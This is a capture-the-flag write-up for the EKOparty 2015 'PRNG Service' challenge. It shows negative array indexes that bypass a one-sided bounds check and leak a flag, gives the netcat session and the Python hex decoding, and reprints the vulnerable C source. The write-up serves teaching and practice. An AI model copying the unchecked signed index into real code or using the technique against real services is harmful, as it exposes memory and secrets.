EKOparty PRNG service
@mrexcessive WHA
EKOparty15 pwn25 PRNG Service
The problem
Description: This is our PRNG service source.c provided on Null.Life running at: nc challs.ctf.site 20003 Pwnable Exploit
The solution
OK so the code puts the ANSWER in an array and then generates 64 random numbers further down the array after offset base. The main loop lets the user inspect any of the numbers by entering a number to scanf("%d") and using that number as an offset. So enter 4 and it will tell you the 4th random number in the arry.
The scanf("%d") is not exploitable itself... so...
There is a check to make sure you don't put in a number bigger than 64.
But there is nothing to prevent you putting in a negative number, which lets you move to array indexes below base
So I do that a few times.
I find the flag between -57 and -64, (I should have expected this as base is 64 !)
nc challs.ctf.site 20003 Welcome to PRNG service Please wait while we generate 64 random numbers...5f Process finished Choose a number [0-63]?-57 Your number is: 0x6e312d5f Choose a number [0-63]?-59 Your number is: 0x69735f64 Choose a number [0-63]?-60 Your number is: 0x6e615f6e Choose a number [0-63]?-61 Your number is: 0x6169646e Choose a number [0-63]?-62 Your number is: 0x655f656c Choose a number [0-63]?-63 Your number is: 0x7474696c Choose a number [0-63]?-64 Your number is: 0x7b4f4b45 "EKO{"
So to Python...
>>>print "454b4f7b6c6974746c655f656e6469616e5f616e645f73695f2d316e747d".decode("hex") EKO{little_endian_and_si_-1nt}
erm...
Ah I missed out offset -58... wups !
Choose a number [0-63]?-58 Your number is: 0x64656e67
Python again...
>>>print "454b4f7b6c6974746c655f656e6469616e5f616e645f7369676e65645f2d316e747d".decode("hex") EKO{little_endian_and_signed_-1nt}
Flag ! EKO{little_endian_and_signed_-1nt}
--> ref source:
#include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <answer.h> int main() { signed int i; unsigned int base, try, rnd[128]; printf("Welcome to PRNG service\nPlease wait while we generate 64 random numbers...\n"); fflush(0); sleep(2); strcpy((char *)&rnd[0], ANSWER); # our flag is stored on answer.h srandom(1337); base = 64; for (i = 0; i < 64; i++) rnd[base + i] = random(); printf("Process finished\n"); fflush(0); try = 0; while (try < 10) { printf("Choose a number [0-63]?"); fflush(0); scanf("%d", &i); fflush(0); if (i < 64) { printf ("Your number is: 0x%08x\n", rnd[base + i]); } else { printf("Index out of range\n"); } try++; fflush(0); } printf ("Thank you for using our service\n"); fflush(0); return 0; }